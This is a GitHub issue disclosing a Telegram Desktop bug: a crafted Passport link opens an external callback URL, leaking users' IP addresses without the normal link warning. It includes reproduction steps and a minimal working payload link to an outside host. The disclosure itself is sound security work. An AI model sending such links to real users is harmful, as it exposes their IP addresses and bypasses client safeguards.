New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security vulnerability: New Passport feature can leak the client's IP address #5020

Closed
MihaZupan opened this Issue Jul 27, 2018 · 1 comment

Comments

Projects
None yet
1 participant
@MihaZupan

MihaZupan commented Jul 27, 2018

Steps to reproduce

  1. Send a malicious link to a chat/group
  2. The user clicks on the link, exposing the IP address without triggering the "Open this link" warning
  3. GG

Expected behaviour

There should be a warning before navigating to the callback if the user cancels the authentication

Actual behaviour

There is no such warning, the user can't escape leaking their IP, short of closing the entire app.

Configuration

Operating system:
Windows
Version of Telegram Desktop:
1.3.10
Used theme:
Doesn't matter

Details

The link isn't even exactly 'malicious'. It is a resolve/?domain=telegrampassport link.

--- Copy pasted from the email sent to security@telegram.org ---
The user can set a link associated with some text.
That means you can send a message like: check this out - this being a link.
With the passport feature that link can be a prompt for authentication e.g.
https://gist.github.com/MihaZupan/4143c292041d0dd80191e0419fdcd0b5

This link contains a callback field with an external URL.
If a user clicks on the link they are immediately prompted to enter authentication details. But if they close the window (which the obviously would if they just randomly clicked on a link) the client opens their browser and navigates to the callback link - exposing their IP address.
This is even more severe since for all external links the client displays a warning, telling the user what that link points to. With this link the user practically can't not give out his IP, short of closing the whole app.

@MihaZupan

This comment has been minimized.

Show comment
Hide comment
@MihaZupan

MihaZupan Jul 29, 2018

Even a link as short as tg://resolve/?domain=telegrampassport&callback_url=https%3A%2F%2Fbot-telegram.ml is enough. It's not even close to being a valid link for a passport request but the callback is still executed. This directly bypasses the link warning system.

MihaZupan commented Jul 29, 2018

Even a link as short as tg://resolve/?domain=telegrampassport&callback_url=https%3A%2F%2Fbot-telegram.ml is enough. It's not even close to being a valid link for a passport request but the callback is still executed. This directly bypasses the link warning system.

MrMebelMan added a commit to MrMebelMan/tdesktop that referenced this issue Aug 31, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment